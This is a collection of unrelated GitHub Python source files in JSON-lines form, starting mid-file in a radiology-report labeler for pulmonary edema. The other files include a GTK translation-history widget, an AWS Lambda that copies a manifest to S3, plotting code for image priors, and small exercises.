empty, e.g. no mention \n if col not in ignore_labels and not math.isnan(chexpert_row[col]): \n return True \n\n return False \n\ndef get_final_label(sentence, chexpert_label, keyword_label, related_rad_label, other_finding, chexpert_row):\n \"\"\"\n sentence sentence to label\n chexpert_label CheXpert label for pulmonary edema\n keyword_label Keyword label from output of assign_keyword_label()\n related_rad_label Related radiologic feature label from output of assign_related_rad()\n other_finding Other finding label from output of assign_other_finding()\n chexpert_row output of CheXpert labeler (1, 0, nan) for 14 observations in chest radiographs, represented as a Series \n\n Returns a value indicating whether sentence is relevant or not relevant to pulmonary edema (1, 0)\n \"\"\"\n final_label = 0.0\n nochange_keywords = pd.read_csv(CONSTANTS.nochange_file)['regex'].tolist()\n\n # If pulmonary edema is mentioned as present, then consider sentence relevant\n if chexpert_label == 1.0 or keyword_label == 1.0:\n final_label = 1.0\n\n # If pulmonary edema is mentioned as absent, then consider sentence relevant \n elif chexpert_label == 0.0 or keyword_label == 0.0:\n final_label = 1.0\n\n # If there is a related radiographic feature and no mention of another finding, then consider sentence relevant\n elif not math.isnan(related_rad_label) and math.isnan(other_finding):\n final_label = 1.0\n\n # If sentence indicates no general change in condition, then consider it to be relevant\n if final_label == 0.0:\n for key in nochange_keywords:\n if re.search(key, sentence.lower()) is not None:\n # Exclude phrases like \"no change in cardiomegaly\" or \"stable atelectasis\"\n if not get_other_finding_mention(chexpert_row): \n final_label = 1.0\n break \n \n return final_label\n\ndef get_all_relevance_data(chexpert_row, metadata, true_labels):\n sentence = chexpert_row['Reports']\n chexpert_label = abs(chexpert_row['Edema'])\n chexpert_label_unprocessed = chexpert_row['Edema']\n other_finding = assign_other_finding(chexpert_row)\n keyword_label = assign_keyword_label(sentence)\n related_rad_label = assign_related_rad(sentence)\n\n final_label = get_final_label(sentence, chexpert_label, keyword_label, related_rad_label, other_finding, chexpert_row)\n\n if true_labels:\n return [sentence, metadata['subject'], metadata['study'], final_label, metadata['relevant'], chexpert_label, chexpert_label_unprocessed, \\\n keyword_label, related_rad_label, other_finding, metadata['comparison'], metadata['comparison label']]\n\n else:\n return [sentence, metadata['subject'], metadata['study'], final_label, chexpert_label, chexpert_label_unprocessed, keyword_label, \\\n related_rad_label, other_finding]\n\ndef print_incorrect(true_labels, predicted_labels):\n for index, sentence in true_labels.iterrows():\n if sentence['relevant'] != predicted_labels['relevant'][index]:\n print(predicted_labels['relevant'][index], sentence['relevant'], sentence['sentence']) \n\ndef evaluate_labeler(true_labels_path, predicted_labels_path, output_path=None):\n true_labels = pd.read_csv(true_labels_path)\n predicted_labels = pd.read_csv(predicted_labels_path)\n\n result = evaluate(true_labels['relevant'].values, predicted_labels['relevant'].values)\n\n if output_path is not None:\n result_df = pd.Series(result).to_frame()\n result_df.to_csv(output_path)\n \n pprint.pprint(result) \n print_incorrect(true_labels, predicted_labels) \n\ndef run_labeler(chexpert_label_path, metadata_labels_path, true_labels=False):\n chexpert_sentences = pd.read_csv(chexpert_label_path)\n metadata = pd.read_csv(metadata_labels_path, dtype={'subject': 'str', 'study': 'str'})\n \n all_data = []\n for index, row in chexpert_sentences.iterrows():\n processed_row = get_all_relevance_data(row, metadata.iloc[index, :], true_labels=true_labels)\n all_data.append(processed_row)\n\n columns = []\n if true_labels:\n columns = ['sentence', 'subject', 'study', 'relevant', 'ground_truth_relevant', 'chexpert_label', 'chexpert_unprocessed', \\\n 'keyword_label', 'related_rad_label', 'other_finding', 'comparison_finding', 'comparison_label']\n else:\n columns = ['sentence', 'subject', 'study', 'relevant', 'chexpert_label', 'chexpert_unprocessed', 'keyword_label', 'related_rad_label', 'other_finding']\n\n df = pd.DataFrame(all_data, columns=columns)\n return df \n\ndef main_label():\n \"\"\"\n Run and evaluate labeler for pulmonary edema relevance. Also saves output labels of automatic labeler\n\n Requires as inputs\n 1. CSV file with results of CheXpert labeler\n 2. Filename to write the results of this automatic labeler\n 3. CSV file with true labels (1, 0) \n \"\"\"\n parser = argparse.ArgumentParser(description='Get sentences relevant to pulmonary edema')\n\n # Relative paths to PE_PATH\n parser.add_argument('chexpert_labels_path', type=str, help='Path to file with chexpert-labeled sentences')\n parser.add_argument('output_labels_path', type=str, help='Path to file to write output labels')\n parser.add_argument('true_labels_path', type=str, help='Path to file with ground-truth relevance labels')\n args = parser.parse_args()\n\n chexpert_labels_path = os.path.join(os.environ['PE_PATH'], args.chexpert_labels_path)\n output_labels_path = os.path.join(os.environ['PE_PATH'], args.output_labels_path)\n true_labels_path = os.path.join(os.environ['PE_PATH'], args.true_labels_path)\n\n final_labels = run_labeler(chexpert_labels_path, true_labels_path, true_labels=True)\n final_labels.to_csv(output_labels_path)\n\ndef main_evaluate():\n \"\"\"\n Evaluate results of automatic labeler that identifies whether a sentence is related to pulmonary edema diagnosis. \n \n Requires as inputs\n 1. CSV file with true labels (1, 0) \n 2. CSV file with predicted labels (1, 0)\n 3. Filename to write evaluation results \n \"\"\"\n parser = argparse.ArgumentParser(description='Get sentences relevant to pulmonary edema')\n\n # Relative paths to PE_PATH\n parser.add_argument('true_labels_path', type=str, help='Path to file with ground-truth relevance labels')\n parser.add_argument('predicted_labels_path', type=str, help='Path to file with predicted relevance labels')\n parser.add_argument('output_path', type=str, help='Path to file to write evaluation results')\n args = parser.parse_args()\n\n true_labels_path = os.path.join(os.environ['PE_PATH'], args.true_labels_path) \n predicted_labels_path = os.path.join(os.environ['PE_PATH'], args.predicted_labels_path)\n output_path = os.path.join(os.environ['PE_PATH'], args.output_path)\n\n evaluate_labeler(true_labels_path, predicted_labels_path, output_path=None)\n\ndef main_predict():\n \"\"\"\n Run labeler for pulmonary edema relevance. Also saves output labels of automatic labeler\n\n Requires as inputs\n 1. CSV file with results of CheXpert labeler\n 2. Filename to write the results of this automatic labeler\n 3. CSV file with metadata\n \"\"\"\n parser = argparse.ArgumentParser(description='Get sentences relevant to pulmonary edema')\n\n # Relative paths to PE_PATH\n parser.add_argument('chexpert_labels_path', type=str, help='Path to file with chexpert-labeled sentences')\n parser.add_argument('output_labels_path', type=str, help='Path to file to write output labels')\n parser.add_argument('metadata_labels_path', type=str, help='Path to file with subject and study labels')\n args = parser.parse_args()\n\n chexpert_labels_path = os.path.join(os.environ['PE_PATH'], args.chexpert_labels_path)\n output_labels_path = os.path.join(os.environ['PE_PATH'], args.output_labels_path)\n metadata_labels_path = os.path.join(os.environ['PE_PATH'], args.metadata_labels_path)\n\n final_labels = run_labeler(chexpert_labels_path, metadata_labels_path)\n final_labels.to_csv(output_labels_path)\n\ndef test_script():\n chexpert = pd.read_csv(\"data/dataset-small/chexpert-labels-small.csv\", dtype={'subject': 'str', 'study': 'str'})\n metadata = pd.read_csv(\"data/dataset-small/sentences-split-small.csv\", dtype={'subject': 'str', 'study': 'str'})\n print(get_all_relevance_data(chexpert.iloc[119, :], metadata.iloc[119, :], False))\n\nif __name__ == \"__main__\":\n main_evaluate()\n # main_label()\n # test_script()\n\n","repo_name":"shu98/pulmonary-edema-project","sub_path":"nlp/get_relevant_sentences_2.py","file_name":"get_relevant_sentences_2.py","file_ext":"py","file_size_in_byte":13917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21646133126","text":"import gi\n\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\ngi.require_version('Gdk', '3.0')\nfrom gi.repository import Gdk\n\ngi.require_version('WebKit', '3.0')\nfrom gi.repository import WebKit\n\n\nclass TranslationHistoryFileChooser(Gtk.FileChooserDialog):\n def __init__(self, parent):\n Gtk.FileChooserDialog.__init__(self, \"Please choose a file\", parent,\n Gtk.FileChooserAction.SAVE,\n (Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,\n Gtk.STOCK_OPEN, Gtk.ResponseType.OK))\n\n\nclass TranslationHistoryToolbarWidget(Gtk.Toolbar):\n _parent = None\n\n def __init__(self, parent):\n self._parent = parent\n\n Gtk.Toolbar.__init__(self)\n\n self.set_style(Gtk.ToolbarStyle.TEXT)\n self.insert(self.widget_remove_selected, 0)\n self.insert(self.widget_remove_all, 1)\n self.insert(self.widget_export_csv, 2)\n self.insert(self.widget_save, 3)\n\n @property\n def widget_remove_selected(self):\n button = Gtk.ToolButton()\n button.set_label(\"Remove selected\")\n button.connect(\"clicked\", self._parent.on_button_remove_selected)\n return button\n\n @property\n def widget_remove_all(self):\n button = Gtk.ToolButton()\n button.set_label(\"Remove all\")\n button.connect(\"clicked\", self._parent.on_button_remove_all)\n return button\n\n @property\n def widget_export_csv(self):\n button = Gtk.ToolButton()\n button.set_label(\"Export as CSV\")\n button.connect(\"clicked\", self._parent.on_button_export_csv)\n return button\n\n @property\n def widget_save(self):\n button = Gtk.ToolButton()\n button.set_label(\"Save changes\")\n button.connect(\"clicked\", self._parent.on_button_save)\n return button\n\n\nclass TranslationHistoryTreeWidget(Gtk.ScrolledWindow):\n _tree = None\n _store = None\n _dispatcher = None\n\n def __init__(self, window=None, dispatcher=None):\n self._store = Gtk.ListStore(bool, str, str)\n Gtk.ScrolledWindow.__init__(self)\n self.add(self.widget_tree)\n\n @property\n def store(self):\n return self._store\n\n @store.setter\n def store(self, value):\n for line in reversed(value):\n fields = line.strip(\"\\n\").split(';')\n if len(fields) >= 2:\n self._store.append([0, fields[0].strip(), fields[1]])\n self._tree.set_model(self._store)\n\n @property\n def widget_tree(self):\n self._tree = Gtk.TreeView()\n self._tree.append_column(self.widget_tree_checkbox)\n self._tree.append_column(self.widget_tree_date)\n self._tree.append_column(self.widget_tree_word)\n return self._tree\n\n @property\n def widget_tree_checkbox(self):\n checkbox = Gtk.CellRendererToggle()\n checkbox.connect(\"toggled\", self.on_cell_toggled)\n checkbox.set_padding(5, 5)\n return Gtk.TreeViewColumn(\"\", checkbox, active=0)\n\n @property\n def widget_tree_date(self):\n data = Gtk.CellRendererText()\n data.set_property(\"editable\", True)\n data.set_padding(5, 5)\n data.connect(\"edited\", self.on_data_edited)\n return Gtk.TreeViewColumn(\"Data\", data, text=1)\n\n @property\n def widget_tree_word(self):\n word = Gtk.CellRendererText()\n word.set_property(\"editable\", True)\n word.connect(\"edited\", self.on_word_edited)\n word.set_padding(5, 5)\n return Gtk.TreeViewColumn(\"Word\", word, text=2)\n\n def on_cell_toggled(self, widget, path):\n self._store[path][0] = not self._store[path][0]\n\n def on_data_edited(self, widget, path, text):\n self._store[path][1] = text\n\n def on_word_edited(self, widget, path, text):\n self._store[path][2] = text\n\n\nclass HistoryLabelWidget(Gtk.Label):\n def __init__(self):\n Gtk.Label.__init__(self)\n self.set_margin_top(8)\n self.set_margin_bottom(8)\n self.set_justify(Gtk.Justification.RIGHT)\n\n\nclass HistoryToolbarTopWidget(Gtk.Grid):\n _label = None\n _parent = None\n\n def __init__(self, parent):\n self._parent = parent\n self._label = HistoryLabelWidget()\n\n Gtk.Grid.__init__(self)\n self.attach(self._button, 0, 0, 1, 1)\n self.attach(self._label, 1, 0, 4, 1)\n\n @property\n def label(self):\n self._label.get_label()\n\n @label.setter\n def label(self, value):\n self._label.set_label(value)\n\n @property\n def _button(self):\n button = Gtk.ToolButton()\n button.set_label(\"History file\")\n button.connect(\"clicked\", self._parent.on_history_file_choose)\n return button\n\n\nclass DictionaryHistoryAreaWidget(Gtk.VBox):\n _history = None\n _window = None\n _toolbar_top = None\n _toolbar_bottom = None\n\n def __init__(self, window, history):\n self._window = window\n self._history = history\n\n self._toolbar_top = HistoryToolbarTopWidget(self)\n self._toolbar_top.label = \": %s \" % self.history\n\n self._content = TranslationHistoryTreeWidget(self)\n with open(self.history, 'r') as stream:\n self._content.store = stream.readlines()\n\n self._toolbar_bottom = TranslationHistoryToolbarWidget(self)\n\n Gtk.VBox.__init__(self, homogeneous=False, spacing=0)\n self.pack_start(self._toolbar_top, False, False, 0)\n self.pack_start(self._content, True, True, 0)\n self.pack_start(self._toolbar_bottom, False, True, 0)\n\n @property\n def history(self):\n return self._history.history\n\n def on_history_output(self, event, dispatcher):\n self._content.store.clear()\n with open(self.history, 'r') as stream:\n self._content.store = stream.readlines()\n self._toolbar_top.label = \": %s \" % self.history\n\n def on_dictionary_clipboard(self, event, dispatcher):\n self._content.store.clear()\n with open(self.history, 'r') as stream:\n self._content.store = stream.readlines()\n\n def on_dictionary_translation(self, event, dispatcher):\n self._content.store.clear()\n with open(self.history, 'r') as stream:\n self._content.store = stream.readlines()\n\n def on_button_remove_selected(self, button):\n for row in self._content.store:\n if row[0] is not False:\n self._content.store.remove(row.iter)\n\n def on_button_remove_all(self, button):\n self._content.store.clear()\n\n def on_button_export_csv(self, button):\n dialog = TranslationHistoryFileChooser(self._window)\n response = dialog.run()\n if response == Gtk.ResponseType.OK:\n with open(dialog.get_filename(), 'w') as stream:\n for row in self._content.store:\n stream.write(\"%s;%s\\n\" % (row[1], row[2]))\n dialog.destroy()\n\n def on_button_save(self, button):\n with open(self.history, 'w') as stream:\n for row in reversed(self._content.store):\n stream.write(\"%s;%s\\n\" % (row[1], row[2]))\n\n def on_history_file_choose(self, button):\n dialog = TranslationHistoryFileChooser(self._window)\n response = dialog.run()\n if response == Gtk.ResponseType.OK:\n self._window.on_dictionary_history_changed(dialog.get_filename())\n dialog.destroy()\n","repo_name":"AlexWoroschilow/dictionary-indicator","sub_path":"vendor/uix/widget/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":7392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14195201656","text":"from sentinels import NOTHING\n\n\n__all__ = [\n \"TypesRegistry\",\n \"get_registry\"\n]\n\n\nclass TypesRegistry:\n def __init__(self):\n self._mapping = {}\n self._back = {}\n\n def register(self, type_, alias):\n assert isinstance(type_, type)\n assert isinstance(alias, type)\n self._mapping[type_] = alias\n self._back[alias] = type_\n\n def get_alias(self, type_, default=NOTHING):\n if default is NOTHING:\n return self._mapping[type_]\n else:\n return self._mapping.get(type_, default)\n\n def get_type(self, alias, default=NOTHING):\n if default is NOTHING:\n return self._back[alias]\n else:\n return self._back.get(alias, default)\n\n\n_registry = TypesRegistry()\n\n\ndef get_registry():\n return _registry\n","repo_name":"Evgenus/versioned-data","sub_path":"versioned/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"73502720540","text":"# values = [1, 2, 3, 4, 5]\n# def list_sum():\n# total = 0\n# for value in values:\n# total += value\n# return total\n# print(list_sum())\n\ndicts = [{'name': 'kim', 'age': 12}, {'name': 'lee', 'age': 4}]\ndef dict_list_sum():\n total = 0\n for value in dicts:\n total += value['age']\n return total\nprint(dict_list_sum())\n\n# values = [[1], [2, 3], [4, 5, 6], [7, 8, 9, 10]]\n# def all_list_sum():\n# total = 0\n# for value in values:\n# for i in value:\n# total += i\n# return total\n# print(all_list_sum())","repo_name":"LeesangyeopSSAFY/TIL","sub_path":"01_Python/0721/ws0721.py","file_name":"ws0721.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"6588734457","text":"import tkinter.messagebox\nimport customtkinter\n\nclass Main():\n\n def load_main_page_view(app, ctk_frame):\n ctk_frame.grid_rowconfigure(0, minsize=10)\n ctk_frame.grid_rowconfigure(1, weight=1)\n ctk_frame.grid_columnconfigure(0, weight=1)\n\n app.ctkl_page_title = customtkinter.CTkLabel(master=ctk_frame,\n text=\"Sistema de Abertura de Nao Conformidades V2\",\n text_font=(\"Bebas Neue\", 2*app.CONTEXT))\n app.ctkl_page_title.grid(\n row=0, column=0, pady=app.CONTEXT, padx=app.CONTEXT)\n\n app.ctkf_form_content = customtkinter.CTkFrame(master=ctk_frame)\n app.ctkf_form_content.grid(row=1, column=0, sticky=\"nswe\",\n padx=app.CONTEXT, pady=app.CONTEXT)\n\n\n app.ctkf_form_content.grid_columnconfigure(0, weight=1)\n app.ctkf_form_content.grid_columnconfigure(1, weight=1)\n app.ctkf_form_content.grid_rowconfigure(0, minsize=10)\n app.ctkf_form_content.grid_rowconfigure(10, weight=1)\n\n app.ctkl_identity = customtkinter.CTkLabel(master=app.ctkf_form_content,\n text=\"Identificacao\",\n text_font=(\"Roboto Medium\", -16))\n app.ctkl_identity.grid(row=1, column=0, sticky=\"w\", pady=10, padx=0)\n\n app.ctks_identity = customtkinter.CTkOptionMenu(master=app.ctkf_form_content,\n values=[\"Light\", \"Dark\", \"System\"])\n app.ctks_identity.grid(row=2, column=0, sticky=\"we\", pady=10, padx=20)\n\n app.ctkl_description = customtkinter.CTkLabel(master=app.ctkf_form_content,\n text=\"Descricao\",\n text_font=(\"Roboto Medium\", -16))\n app.ctkl_description.grid(row=3, column=0, sticky=\"w\", pady=10, padx=0)\n app.ctke_description = customtkinter.CTkTextbox(master=app.ctkf_form_content,\n height=app.CONTEXT*5, fg_color=\"grey25\")\n app.ctke_description.insert(\n \"0.0\", \"Escreva aqui a descricao da nao conformidade\")\n app.ctke_description.grid(row=4, column=0, sticky=\"we\", pady=10, padx=20)\n\n app.ctkl_rootcause = customtkinter.CTkLabel(master=app.ctkf_form_content,\n text=\"Analise de Causa Raiz\",\n text_font=(\"Roboto Medium\", -16))\n app.ctkl_rootcause.grid(row=3, column=1, sticky=\"w\", pady=10, padx=20)\n app.ctke_rootcause = customtkinter.CTkTextbox(master=app.ctkf_form_content,\n height=app.CONTEXT*5, fg_color=\"grey25\")\n app.ctke_rootcause.insert(\n \"0.0\", \"Escreva aqui a sua analise de causa raiz\")\n app.ctke_rootcause.grid(row=4, column=1, sticky=\"we\", pady=10, padx=20)\n\n app.ctkl_solution = customtkinter.CTkLabel(master=app.ctkf_form_content,\n text=\"Acoes corretivas\",\n text_font=(\"Roboto Medium\", -16))\n app.ctkl_solution.grid(row=5, column=0, sticky=\"w\", pady=10, padx=20)\n\n app.ctke_solution = customtkinter.CTkTextbox(master=app.ctkf_form_content,\n height=app.CONTEXT*5, fg_color=\"grey25\")\n app.ctke_solution.insert(\n \"0.0\", \"Escreva aqui as acoes tomadas para solucionar o problema\")\n app.ctke_solution.grid(row=6, column=0, sticky=\"we\", pady=10, padx=20)\n\n app.ctkcheck_critical = customtkinter.CTkCheckBox(master=app.ctkf_form_content,\n text=\"Critico\")\n app.ctkcheck_critical.grid(row=6, column=1, sticky=\"we\", pady=10, padx=20)\n\n app.ctkb_create = customtkinter.CTkButton(master=app.ctkf_form_content,\n text=\"Criar\", command=app.save_result)\n app.ctkb_create.grid(row=7, column=0, pady=10, padx=20, sticky=\"nsew\")\n\n return ctk_frame\n\n \n","repo_name":"GuilhermeTagliati/Python_for_Non_Programmers","sub_path":"01_NON_CONFORMITIES_PROJECT/role model project/views/main_page.py","file_name":"main_page.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"43206327230","text":"# Currently unused function to implement env manifest copying for use as S3 source artifact\nimport boto3\nfrom io import BytesIO\nimport os\nimport zipfile\nimport logging\n\ndef lambda_handler():\n\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n\n account = boto3.client(\"sts\").get_caller_identity()[\"Account\"]\n region = os.environ[\"AWS_REGION\"]\n target_bucket_name = f\"serverbot2-pipeline-manifest-copy-{account}-{region}\"\n logger.debug(f\"Generated bucket name is {target_bucket_name}\")\n\n ssm = boto3.client(\"ssm\")\n manifest_string = ssm.get_parameter(Name=\"DeploymentEnvironmentManifest\")[\"Parameter\"][\"Value\"]\n # Avoid posting actual content to logs\n logger.debug(f\"Got manifest string, length={len(manifest_string)}\")\n\n logger.debug(\"Creating zip data...\")\n zipped_data = BytesIO()\n zip = zipfile.ZipFile(zipped_data, \"w\")\n zip.writestr(\"manifest.json\", manifest_string)\n zip.close()\n\n logger.debug(\"Pushing to S3...\")\n s3 = boto3.client(\"s3\")\n s3.put_object(\n Bucket=target_bucket_name,\n Key=\"manifest.zip\",\n Body=zipped_data\n )\n","repo_name":"HtyCorp/serverbot2-core","sub_path":"deployment/application-infrastructure/src/main/resources/manifest_copy_function/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"71962933341","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport torch as th\n\nimport data\nimport models\n\nplt.rcParams.update({\n \"text.usetex\": True,\n})\nplt.rcParams['axes.titlepad'] = 2\n\nsigmas = [0, .025, .05, .1, .2]\nN = len(sigmas)\nplt.rcParams[\"axes.prop_cycle\"] = plt.cycler(\n \"color\", plt.cm.coolwarm(np.linspace(0, 1, N))\n)\n\nkernel_size = 7\nn_f = kernel_size**2 - 1\nbs = 64 * 4000\npatch_size = kernel_size\ncolor = False\nrotate = True\nflip = True\nn_w = 63 * 2 - 1\nn_scales = 20\n\ndataset = data.BSDS(color, bs, patch_size, rotate, flip)\ngamma = 1.\nR_gsm = models.ProductGSM(\n n_f=n_f,\n bound_norm=False,\n zero_mean=True,\n ortho=True,\n n_scales=n_scales,\n kernel_size=kernel_size,\n K_init='random',\n).cuda()\nth.set_grad_enabled(False)\n\nstate = th.load('./out/gsm/state_final.pth')\nstate['w.w'] = state['w']\nR_gsm.load_state_dict(state)\nR_gmm = models.ProductGMM(\n n_f=n_f,\n bound_norm=False,\n zero_mean=True,\n symmetric=True,\n ortho=True,\n vmin=-1,\n vmax=1,\n kernel_size=kernel_size,\n K_init='random',\n n_w=n_w,\n w_init='student-t',\n sigmas=th.Tensor(sigmas)\n).cuda()\nth.set_grad_enabled(False)\n\nstate = th.load('./out/patch/state_final.pth')\nR_gmm.load_state_dict(state)\nylims_f_ = {\n 'gmm': [-.2, 10],\n 'gsm': [-.2, 6],\n}\nylims_fp_ = {\n 'gmm': [-20, 20],\n 'gsm': [-9.5, 9.5],\n}\nylims_tweedie_ = {\n 'gmm': [-1, 1],\n 'gsm': [-1, 1],\n}\nfor y in dataset:\n break\ndm = 0.01\nbin_edges = th.linspace(\n -gamma - dm / 2,\n gamma + dm / 2,\n n_w + 1,\n).cuda()\nx_hist = (bin_edges[1:] + bin_edges[:-1]) / 2\nfor R, name in zip([R_gmm, R_gsm], ['gmm', 'gsm']):\n hist = th.zeros((len(sigmas), n_f, n_w)).cuda()\n ylims_f = ylims_f_[name]\n ylims_fp = ylims_fp_[name]\n ylims_tweedie = ylims_tweedie_[name]\n for i_s, sigma in enumerate(sigmas):\n R.set_sigma(sigma)\n Kx = R.K(y + sigma * th.randn_like(y))\n\n for k in range(n_f):\n hist[\n i_s,\n k] = th.histogram(Kx[:, k].reshape(-1).cpu(),\n bin_edges.cpu())[0].to('cuda')\n\n fs = []\n fps = []\n K = R.K.weight.data\n scale = 1.1\n\n n_points = 20\n x = th.linspace(\n -scale * gamma,\n scale * gamma,\n n_points**2,\n dtype=K.dtype,\n device=K.device,\n )[None].repeat(n_f, 1)\n for sig in sigmas:\n R.set_sigma(sig)\n f, fp = R.pot_act(x.view(1, n_f, n_points, n_points))\n f = f.view(n_f, n_points * n_points)\n fp = fp.view(n_f, n_points * n_points)\n fs.append(f)\n fps.append(fp)\n\n x = x[0]\n\n fs = th.stack(fs).permute(1, 0, 2)\n fps = th.stack(fps).permute(1, 0, 2)\n norm_k = (K**2).sum((1, 2, 3))\n indices = th.sort(norm_k)[1]\n K = K[indices]\n fs = fs[indices]\n fps = fps[indices]\n hist = hist.permute(1, 0, 2)\n hist = hist[indices]\n\n fig_k, ax_k = plt.subplots(3, 16, figsize=(16, 3))\n fig_f, ax_f = plt.subplots(3, 16, figsize=(16, 3))\n fig_fp, ax_fp = plt.subplots(3, 16, figsize=(16, 3))\n fig_tweedie, ax_tweedie = plt.subplots(3, 16, figsize=(16, 3))\n fig_h, ax_h = plt.subplots(3, 16, figsize=(16, 3))\n\n for i, (ff, ffp, hh, kk) in enumerate(zip(fs, fps, hist, K)):\n r, c = divmod(i, 16)\n for sigma, fff, fffp, hhh in zip(sigmas, ff, ffp, hh):\n neg_log = -th.log(hhh).detach().cpu().numpy()\n neg_log -= neg_log.min()\n fff -= fff.min()\n ax_h[r, c].plot(x_hist.cpu(), neg_log)\n ax_f[r, c].plot(x.cpu(), fff.cpu())\n ax_fp[r, c].plot(x.cpu(), fffp.cpu())\n ax_tweedie[r, c].plot(\n x.cpu(),\n x.cpu().numpy() - sigma**2 * fffp.cpu().numpy()\n )\n for axx, ylims in zip([ax_f, ax_h, ax_fp, ax_tweedie],\n [ylims_f, ylims_f, ylims_fp, ylims_tweedie]):\n axx[r, c].set_ylim(ylims)\n axx[r, c].grid(True)\n if (r, c) == (2, 0):\n xt = axx[r, c].get_xticklabels()\n if (r, c) != (2, 0):\n axx[r, c].tick_params(tick1On=False)\n axx[r, c].set_xticklabels([])\n axx[r, c].set_yticklabels([])\n axx[r, c].set_frame_on(False)\n\n k_plot = ax_k[r, c].imshow(kk.cpu().squeeze(), cmap='gray')\n ax_k[r, c].axis('off')\n ax_k[r, c].set_title(\n f'\\\\( [{kk.min().item()*10:.1f}, {kk.max().item()*10:.1f}] \\\\)',\n fontsize=8\n )\n\nplt.show()\n","repo_name":"VLOGroup/PoGMDM","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"34234050003","text":"from ..models import ETL_Dataset\nfrom ..serializers import ETL_DatasetSerializer\n\n\nclass ETL_DatasetService():\n\n @staticmethod\n def is_datasetname_avalaible(input__datasetname):\n try:\n existing_etl_dataset = ETL_Dataset.objects.filter(dataset_name=str(input__datasetname).strip())[0]\n return False\n except:\n return True\n\n\n @staticmethod\n def does_etl_dataset_exist__by_uuid(input__uuid):\n try:\n existing_etl_dataset = ETL_Dataset.objects.filter(uuid=str(input__uuid).strip())[0]\n return True\n except:\n return False\n\n @staticmethod\n def create_etl_dataset_from_datasetname_only(input__datasetname, created_by=\"create_dataset_from_datasetname_only\"):\n try:\n new_etl_dataset = ETL_Dataset()\n new_etl_dataset.dataset_name = str(input__datasetname).strip()\n new_etl_dataset.created_by = str(created_by).strip()\n new_etl_dataset.save()\n\n return True, new_etl_dataset.uuid\n except:\n return False, \"\"\n\n @staticmethod\n def get_all_etl_datasets_preview_list():\n ret_list = []\n try:\n all_datasets = ETL_Dataset.objects.all()\n for current_dataset in all_datasets:\n ret_list.append(ETL_DatasetSerializer(current_dataset).data)\n except:\n ret_list = []\n return ret_list\n\n @staticmethod\n def is_a_valid_subtype_string(input__string):\n try:\n input__string = str(input__string).strip()\n valid_subtypes_string_list = ETL_DatasetService.get_all_subtypes_as_string_array()\n if input__string in valid_subtypes_string_list:\n return True\n except:\n return False\n\n @staticmethod\n def get_all_subtypes_as_string_array():\n return list(\n ETL_Dataset.objects.order_by('dataset_subtype').values_list('dataset_subtype', flat=True).distinct())\n","repo_name":"SERVIR/ClimateSERV2","sub_path":"api/services/etl_dataset_service.py","file_name":"etl_dataset_service.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"69"}
+{"seq_id":"18728927783","text":"from abc import ABCMeta, abstractmethod\n\nfrom domain.model.article import Article, ArticleRepository\n\n\nclass Clock(metaclass=ABCMeta):\n @abstractmethod\n def now(self) -> float:\n pass\n\n\nclass ArticleService:\n def __init__(self, article_repository: ArticleRepository, clock):\n self._article_repository = article_repository\n self._clock = clock\n\n def create_article(self, title, description, body, author_id) -> Article:\n slug = title.lower().replace(' ', '-')\n if self._article_repository.exists_by_slug(slug):\n raise ArticleExistedException(\"the article with slug {} already exists\".format(slug))\n article = Article(slug, title, description, body, author_id)\n now = self._clock.now()\n article.created_at = now\n article.updated_at = now\n return self._article_repository.save(article)\n\n\nclass ArticleExistedException(Exception):\n def __init__(self, message):\n super().__init__(message)\n","repo_name":"mgxian/implementation-patterns-python","sub_path":"domain/service/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"73627182941","text":"class Solution:\n def getConcatenation(self, word: str) -> int:\n asciiNums = \"\"\n for e in word:\n asciiNums += str(ord(e)-97)\n # print(\"ascii num: \"+asciiNums)\n return int(asciiNums)\n def isSumEqual(self, firstWord: str, secondWord: str, targetWord: str) -> bool:\n firstNum = self.getConcatenation(firstWord)\n secondNum = self.getConcatenation(secondWord)\n targetNum = self.getConcatenation(targetWord)\n if firstNum + secondNum == targetNum:\n return True\n return False\n\nX = Solution() \n\nfirstWord = \"acb\"\nsecondWord = \"cba\"\ntargetWord = \"cdb\"\nprint(X.isSumEqual(firstWord, secondWord, targetWord))\n\nfirstWord = \"aaa\"\nsecondWord = \"a\"\ntargetWord = \"aab\"\nprint(X.isSumEqual(firstWord, secondWord, targetWord))\n\nfirstWord = \"aaa\"\nsecondWord = \"a\"\ntargetWord = \"aaaa\"\nprint(X.isSumEqual(firstWord, secondWord, targetWord))","repo_name":"awesome-liuxiao/leetcodesolution","sub_path":"1880_chkWordEqSumOfTwoWords.py","file_name":"1880_chkWordEqSumOfTwoWords.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
